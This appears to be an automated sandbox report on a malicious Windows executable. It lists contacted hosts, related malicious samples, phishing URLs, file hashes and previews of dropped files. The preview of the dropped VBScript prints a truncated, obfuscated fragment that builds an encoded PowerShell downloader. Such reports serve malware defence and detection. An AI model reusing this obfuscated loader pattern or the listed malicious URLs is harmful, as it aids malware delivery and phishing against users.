                https://bitbucket.orgpowershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.166.143.48
                		bitbucket.orgGermany
                		16509AMAZON-02UStrue
                16.182.70.97
                		s3-w.us-east-1.amazonaws.comUnited States
                		unknownunknownfalse
                185.199.111.133
                		raw.githubusercontent.comNetherlands
                		54113FASTLYUStrue

                Private

                IP
                127.0.0.1

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1527751
                Start date and time:2024-10-07 09:32:16 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 40s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:OTO2wVGgkl.exe
                renamed because original name is a hash value
                Original Sample Name:63af3844e6d0a5fa89da17713ce1fb59.exe
                Detection:MAL
                Classification:mal100.spre.expl.evad.winEXE@15/13@4/4
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 44
                • Number of non-executed functions: 29
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1776 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:33:15API Interceptor41x Sleep call for process: powershell.exe modified
                03:33:23API Interceptor2x Sleep call for process: svchost.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.166.143.48https://tiotapas.com.auGet hashmaliciousUnknownBrowse
                  file.exeGet hashmaliciousUnknownBrowse
                    envifa.vbsGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                        https://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                            Leer documentos confidenciales anexos por parte de la Corte Suprema De Justicia.vbsGet hashmaliciousUnknownBrowse
                              scan_documet_027839.vbsGet hashmaliciousUnknownBrowse
                                UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                  Notificacon Documneto (2).vbsGet hashmaliciousUnknownBrowse
                                    185.199.111.133na.rtfGet hashmaliciousRemcosBrowse
                                      na.rtfGet hashmaliciousRemcosBrowse
                                        na.htaGet hashmaliciousCobalt StrikeBrowse
                                          http://mr-zkpak47.github.io/Netflix_Front_PageGet hashmaliciousHTMLPhisherBrowse
                                            http://sachinchaunal.github.io/Netflix-Clone-Old-VersionGet hashmaliciousHTMLPhisherBrowse
                                              na.rtfGet hashmaliciousUnknownBrowse
                                                http://ravichandra1816.github.io/Netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                  MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                    Windows PowerShell.lnkGet hashmaliciousUnknownBrowse
                                                      Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        raw.githubusercontent.comk4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                        • 185.199.108.133
                                                        Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                        • 185.199.108.133
                                                        PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                        • 185.199.108.133
                                                        Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                        • 185.199.108.133
                                                        ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                        • 185.199.109.133
                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                        • 185.199.109.133
                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                        • 185.199.109.133
                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                        • 185.199.111.133
                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                        • 185.199.111.133
                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                        • 185.199.109.133
                                                        s3-w.us-east-1.amazonaws.comhttp://tkweb.life/Get hashmaliciousUnknownBrowse
                                                        • 52.217.0.204
                                                        http://coinbassewalletextensin.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                        • 52.217.120.97
                                                        http://ravichandra1816.github.io/Netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                        • 3.5.21.123
                                                        http://www.auth.coin-cloud.info/Get hashmaliciousUnknownBrowse
                                                        • 52.217.13.180
                                                        http://www.auth.coin-cloud.info/Get hashmaliciousUnknownBrowse
                                                        • 16.182.32.121
                                                        https://pub-8dc94ac03e5a4ccc9206980dbd33a882.r2.dev/ddd.html#3mail@b.cGet hashmaliciousUnknownBrowse
                                                        • 3.5.25.154
                                                        https://syncmart.shop/Get hashmaliciousUnknownBrowse
                                                        • 3.5.30.83
                                                        http://syncmart.shop/wap/Get hashmaliciousUnknownBrowse
                                                        • 54.231.229.217
                                                        https://djisaji.cc/Get hashmaliciousUnknownBrowse
                                                        • 54.231.203.1
                                                        http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                        • 3.5.29.123
                                                        bitbucket.orghttps://tiotapas.com.auGet hashmaliciousUnknownBrowse
                                                        • 185.166.143.48
                                                        GGLoader.exeGet hashmaliciousLaplas Clipper, SilentCrypto MinerBrowse
                                                        • 185.166.143.49
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 185.166.143.48
                                                        sostener.vbsGet hashmaliciousNjratBrowse
                                                        • 185.166.143.50
                                                        sostener.vbsGet hashmaliciousXWormBrowse
                                                        • 185.166.143.50
                                                        0XVZC3kfwL.exeGet hashmaliciousUnknownBrowse
                                                        • 185.166.143.49
                                                        nTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                        • 185.166.143.50
                                                        sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                        • 185.166.143.49
                                                        envifa.vbsGet hashmaliciousUnknownBrowse
                                                        • 185.166.143.48
                                                        sostener.vbsGet hashmaliciousNjratBrowse
                                                        • 185.166.143.50

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        FASTLYUShttp://pub-873fc6a3edb941c6a17f50911dfca518.r2.dev/dbm.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 151.101.66.137
                                                        http://pub-a81aa4bbf83846b8a892985d5bbc3a6f.r2.dev/pppindex.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 151.101.2.137
                                                        http://joeandvelma.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                        • 199.232.188.157
                                                        http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.htmlGet hashmaliciousUnknownBrowse
                                                        • 151.101.194.137
                                                        http://alaindemeuron.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                        • 199.232.188.157
                                                        https://pink664912.studio.site/Get hashmaliciousUnknownBrowse
                                                        • 151.101.2.109
                                                        http://pub-7ccd9eed2f7746f0844d3881a62a4c3f.r2.dev/blob%20(1).htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 151.101.194.137
                                                        http://zlraatonlinefirsatnoktalar.xyz/Get hashmaliciousUnknownBrowse
                                                        • 151.101.2.137
                                                        https://login-att-com.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                        • 151.101.65.46
                                                        Farahexperiences.com_Report_52288.pdfGet hashmaliciousUnknownBrowse
                                                        • 151.101.129.44
                                                        AMAZON-02UShttp://pub-873fc6a3edb941c6a17f50911dfca518.r2.dev/dbm.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 35.156.224.161
                                                        http://pub-a81aa4bbf83846b8a892985d5bbc3a6f.r2.dev/pppindex.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 3.72.140.173
                                                        http://joeandvelma.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                        • 99.86.4.125
                                                        http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.htmlGet hashmaliciousUnknownBrowse
                                                        • 3.72.140.173
                                                        http://alaindemeuron.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                        • 99.86.4.125
                                                        https://pink664912.studio.site/Get hashmaliciousUnknownBrowse
                                                        • 3.161.82.86
                                                        http://pub-7ccd9eed2f7746f0844d3881a62a4c3f.r2.dev/blob%20(1).htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 35.156.224.161
                                                        http://advertising-copyright-review.d2taqiqjh5pjw0.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                        • 65.9.66.32
                                                        http://tkweb.life/Get hashmaliciousUnknownBrowse
                                                        • 52.217.0.204
                                                        https://login-att-com.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                        • 44.236.126.52

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0ehttp://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.htmlGet hashmaliciousUnknownBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        http://advertising-copyright-review.d2taqiqjh5pjw0.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        http://top10-vir4ls-jandamelayu-xs1.biz.id/Get hashmaliciousUnknownBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        https://login-att-com.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        https://pages.tempisite.com/Meta-businessGet hashmaliciousUnknownBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        New order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133
                                                        http://netflix.dittmedlemskap.com/Get hashmaliciousUnknownBrowse
                                                        • 16.182.70.97
                                                        • 185.166.143.48
                                                        • 185.199.111.133

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.7263294577517858
                                                        Encrypted:false
                                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0o:9JZj5MiKNnNhoxuB
                                                        MD5:CB083CD0FF560C343A825D78AE2AC5B1
                                                        SHA1:C90D6420536DB1D4204F42DAA0E1C024461988A0
                                                        SHA-256:697F8401C7DBC548BBE340B5EF3070C5B07C89BD0C794A74DC17F3D38893135F
                                                        SHA-512:D9BE399AB06ABE86372E17FF489FD268C548B5E421780833E974F310116C85F32EA39B2F59E5D892B9574A82D5EE7A24D20B630D12932A950821A26DC8EB3361
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0xba3d4c64, page size 16384, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.7556000801711509
                                                        Encrypted:false
                                                        SSDEEP:1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
                                                        MD5:2B29DA373ADCE2DD4B5AD81117BB39A3
                                                        SHA1:C015E10185DA7BC6158CB7C0200CDFD4F5D2C347
                                                        SHA-256:1128DB8BFF9DF5D2D4022E7962E20080959965299A4C99A5A7A63995D53F43D0
                                                        SHA-512:7032064148E8A9CB726D7B47D1D6BE681CBBC1CF4298C0EB7EC2534D3D0986627F464826FAD75C20EDD533B69058C84D67A190F9B399B5C4FBDDE2AE5E67CA4A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.=Ld... .......7.......X\...;...{......................0.e......!...{?..!...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.......................................!...|..................<@...!...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.07717234446590013
                                                        Encrypted:false
                                                        SSDEEP:3:jc//EYeKLiBeag3NaAPaU1lUiiBetlAlluxmO+l/SNxOf:jcUzKiBdANDPaUMn+AgmOH
                                                        MD5:F6E0BFE9ABC1ECF6C83744BC514FEB5F
                                                        SHA1:6F095655251A64FA0C5E3E7C0906557DBD43B028
                                                        SHA-256:7935F618DB5467AB30300A0D496AFDCFA96B7DFBF19558DD5D6BD069CC6C3C12
                                                        SHA-512:3B0399BF2533D37AC121B7485DBEEF00F128828BD9965FD4A84E1F587EF312A0D1236B4C58816F64E1772EB75265C52B065D86F26EA9203E161E6798A49743CC
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:G.g......................................;...{...!...|...!...{?..........!...{?..!...{?..g...!...{?.................<@...!...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1119
                                                        Entropy (8bit):5.345080863654519
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4j:MxHKlYHKh3oIHKx1qHitHo6hAHKze0Hj
                                                        MD5:1B6869C1B7FFE2691B415D60A088004E
                                                        SHA1:D65C5293683E856ADA02D8F34B1B2CE07EAE707B
                                                        SHA-256:BEE51687135C913F56858329E75BE03DE454DA5669891450A221567029FE9F06
                                                        SHA-512:996C59693C3A5604CA7519A8E5CA1E77D0213E04FA77671623DA6452A9E42C13BBFE577F4EEA21DEE48D08B36E3F65432D6C943A1FE9F60336B8709ED21A6D2B
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:Nllluln52llp:NllUol
                                                        MD5:DD1511ADD69A2BBFD772EE49C6828FBD
                                                        SHA1:D446C5D5B1209CCE7FA673473F913DB360F5931A
                                                        SHA-256:C687FDA1A7A70346FE15F2420682B39C0185696575E46E9785C150FC06D3A629
                                                        SHA-512:46A7C2240420741311A83BE91CC32B224ABA2100DA18302F8347D5CA4DAB58B7B5CE81591D0BBCCB63C38004D49249850E35A7F8F72232072F0126EB9891FEE4
                                                        Malicious:false
                                                        Preview:@...e................................................@..........

                                                        C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs

                                                        Download File
                                                        Process:C:\Users\user\Desktop\OTO2wVGgkl.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):15444
                                                        Entropy (8bit):5.437718567251256
                                                        Encrypted:false
                                                        SSDEEP:384:OJvqOlYGFrIkTJxYBNF+qukPJmxNSiMFpW+jaA:OJv9lYkrT8DF+XwW2hjaA
                                                        MD5:90476F013B7E7E03253D8121ECE7133C
                                                        SHA1:BCF9262009EEBB2D75BA97A3DCFA1B60368671CB
                                                        SHA-256:9787A66FC34711106B281253D196D2DD7271C05E6D52005D5CA28D515528F374
                                                        SHA-512:69856317A25B202CCB6883A685E65663EF52137316CD8CA6454933F7B44C0AD8FD375699A565C97D7B24DC6D0AF97062EC73E55AF882D404D2D323D51560B15E
                                                        Malicious:true
                                                        Preview: 'g..hbphckjogFF = rRegisggfgtertehkggns2211 & ""..Call Uglisging("")..Call Uglisging("")..Call Uglisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#G")..Call Uglisging("k#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#")..edIrhch = LenB("iFodegIm")..Const kIfrIckak = "enfFjIgo"..'kphnjbAd kdScFmri..mpoIcmbnd = LenB("hndmjSd")..Const gemkjAarh = "AchkAok"..Call Uglisging("B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#")..Call Uglisging("dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE")..Call Uglisging("#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#Y")..Call Uglisging("wB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bg")..Const hikpffF = "haImedbe"..'arpkpir hnoaSpI..aaSiFokm = LenB("pFaekAcn")..Const kSFakck = "mknobdbe"..'gfnSIFm gkInbrj..Call Uglisging("Br#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs")..'SmFnrjkp Abmjmnfk..diSpdfFb = LenB("mmbfnApaa")..Const kknchcSd = "cgkgekabS"..'IdgmkrA mkehkba..jdjiFkim = LenB("g

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itjzzu2l.pm1.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqsczsg5.xe4.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0nb5tch.aft.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkcd0xhi.wn1.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rioed2h5.n30.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_worwp5ks.wos.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                        Static File Info

                                                        General

                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Entropy (8bit):6.859449944222372
                                                        TrID:
                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                        • DOS Executable Generic (2002/1) 0.92%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:OTO2wVGgkl.exe
                                                        File size:164'352 bytes
                                                        MD5:63af3844e6d0a5fa89da17713ce1fb59
                                                        SHA1:8b457819c6b7ce8e04755ef75b8ce176bc58fb28
                                                        SHA256:7507af39b3ed38d361e06c2a232d5703369bb11706184d0d10318a5ff3d9cabc
                                                        SHA512:9aca0ac9aa6a344d5d97149aa9c272025623623cfe81dea9dee0c95f16e45c8c2b168756d707ba30c25fff2ec09428699de6ab956da1bd29efc06aae7416910e
                                                        SSDEEP:3072:QahKyd2n31N5GWp1icKAArDZz4N9GhbkrNEk1EYT:QahO5p0yN90QEvE
